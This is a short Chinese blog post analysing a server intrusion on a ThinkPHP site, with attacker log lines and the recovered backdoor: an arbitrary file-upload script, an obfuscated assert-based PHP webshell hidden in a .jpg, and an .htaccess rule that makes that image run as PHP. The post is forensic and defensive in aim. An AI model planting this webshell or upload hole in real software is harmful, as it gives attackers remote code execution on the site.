S4b0r

导航

统计

公告

一次服务器被入侵后的一些措施.

环境:wamp 套件. 2003系统 安装安全狗套件。

程序:thinkphp 自定义开发程序...外买的。

业务员反应后台有人乱删除数据,怀疑让入侵。

随即登上服务器查看日志...

通过查看日志:锁定可疑IP:45.127.97.180  香港...

45.127.97.180 - - [16/Mar/2016:08:49:29 +0800] "GET /Public/uploadify.php HTTP/1.1" 200 969 //查看服务器是否存在uploadify.php 
45.127.97.180 - - [16/Mar/2016:08:49:43 +0800] "GET /Public/ HTTP/1.1" 403 209
45.127.97.180 - - [16/Mar/2016:08:49:47 +0800] "GET /Public/file.php HTTP/1.1" 404 1118
45.127.97.180 - - [16/Mar/2016:08:50:20 +0800] "POST /Public/uploadify.php HTTP/1.1" 200 -
45.127.97.180 - - [16/Mar/2016:08:50:29 +0800] "POST /Public/uploadify.php HTTP/1.1" 200 -
45.127.97.180 - - [16/Mar/2016:08:50:38 +0800] "GET /Public/lib.jpg HTTP/1.1" 200 1599

uploadify.php //后门上传文件

$file=$_FILES['Filedata'];
$path = isset($_REQUEST['path'])&&!empty($_REQUEST['path'])?daddslashes($_REQUEST['path']):'';
if(!$file['tmp_name']||!$file['name']||!$file['size']){
    return false;
}
$path=!empty($path)&&'/'!=substr($path,-1,1)?$path.'/':$path;
$save_name=addslashes($file['name']);
if(!move_uploaded_file($file['tmp_name'],$path.$save_name)){
    WriteErrMsg('文件上传过程中发生错误,请重新上传');
}

上传lib.jpg 文件

if(isset($_REQUEST['newuserid'])){ 
$i[0] = 'asse'.'rt'; 
$array[] = $i; 
$key=str_replace("yBZ","",$_POST['ad']);
$i[1]=base64_decode($key);
$array[0][0]($i[1]);
}

 思考jpg文件如何能够执行,httpd.conf .htaccess配置文件

存在htaccess  因为存在任意文件上传,过狗的一句话很有可能爆路径,上传.htacccess支持jpg 将于php程序运行。

<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>

 

posted on 2016-03-17 00:54 S4b0r 阅读(...) 评论(...) 编辑 收藏